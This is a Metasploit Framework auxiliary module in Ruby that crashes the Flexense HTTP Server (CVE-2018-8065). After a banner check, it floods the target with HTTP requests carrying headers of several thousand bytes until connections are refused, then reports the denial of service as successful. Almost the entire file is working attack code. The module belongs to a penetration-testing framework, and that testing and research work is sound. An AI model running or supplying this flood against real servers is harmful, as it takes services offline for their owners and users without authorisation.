GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/flexense_http_server_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
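class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, description, author, references,
  # disclosure date) and the operator-settable options.
  #
  # PacketCount and PacketSize are declared as integer options so that
  # non-numeric operator input is rejected at validation time rather than
  # silently coerced later.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Flexense HTTP Server Denial Of Service',
        'Description' => %q{
          This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
          Vulnerability caused by a user mode write access memory violation and can be triggered with
          rapidly sending variety of HTTP requests with long HTTP header values.

          Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.
        },
        'Author' => [ 'Ege Balci <[email protected]>' ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            [ 'CVE', '2018-8065'],
            [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
          ],
        'DisclosureDate' => '2018-03-09'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)", 1725 ]),
        # NOTE: the default is drawn once, when the module is loaded, not per run.
        OptInt.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090)", rand(4088..5090) ])
      ]
    )
  end

  # Fingerprints the target by its HTTP response banner.
  #
  # Returns Appears only when the response contains the exact string
  # 'Flexense HTTP Server v10.6.24'. Every other response, including the
  # older releases the description lists as affected, is reported as Safe,
  # so Safe here means "banner did not match", not "verified unaffected".
  # Connection errors yield Unknown.
  def check
    connect
    sock.put("GET / HTTP/1.0\r\n\r\n")
    res = sock.get
    if res&.include?('Flexense HTTP Server v10.6.24')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  rescue Rex::ConnectionRefused
    print_error("Target refused the connection")
    Exploit::CheckCode::Unknown
  rescue
    print_error("Target did not respond to HTTP request")
    Exploit::CheckCode::Unknown
  ensure
    # Always release the probe socket; the original left it open on every path.
    disconnect
  end

  # Sends up to PacketCount requests with a PacketSize-byte Accept header.
  #
  # Aborts via fail_with unless check reports Appears. Returns true as soon
  # as a connection attempt is refused; the module treats that as the sign
  # that the service stopped listening (it is not otherwise confirmed).
  # When the packet budget is used up without a refusal, a failure message
  # is printed.
  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    # Coerce to Integer: an operator-supplied value can arrive as a String,
    # and comparing the Integer counter against a String never matches,
    # which left the loop without its upper bound.
    limit = datastore['PacketCount'].to_i
    print_status("Starting with packets of #{size}-byte strings")

    count = 0
    loop do
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: "+('A' * size)+"\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        count += 1
        break if count >= limit
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination! Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      ensure
        # Close the socket on every path, including when put raises, so
        # descriptors are not leaked on the testing host.
        disconnect
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end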